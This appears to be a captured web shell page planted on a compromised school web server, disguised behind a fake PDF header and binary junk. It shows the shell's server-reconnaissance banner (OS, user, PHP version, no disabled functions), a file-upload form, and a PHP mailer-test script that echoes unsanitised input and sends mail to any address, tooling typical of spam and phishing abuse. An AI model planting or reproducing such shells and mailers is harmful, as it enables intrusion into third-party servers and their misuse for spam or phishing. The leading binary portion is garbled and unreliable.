%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : www.kowitt.ac.th / Your IP : 216.73.216.118 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /inetpub/wwwroot-25650203-BK/wwwroot/activity/20190926-111005/ |
Upload File : |
<?php error_reporting(0); ?> Upload is <b><color>WORKING</color></b><br> Check Mailling ..<br> <form method="post"> <input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br> <input type="submit" value="Send test >>"> </form> <br> <?php if (!empty($_POST['email'])){ if (!empty($_POST['email'])){ $xx =$_POST['orderid']; } else{ $xx = rand(); } mail($_POST['email'],"Result Report Test - ".$xx,"WORKING !"); print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>"; } ?>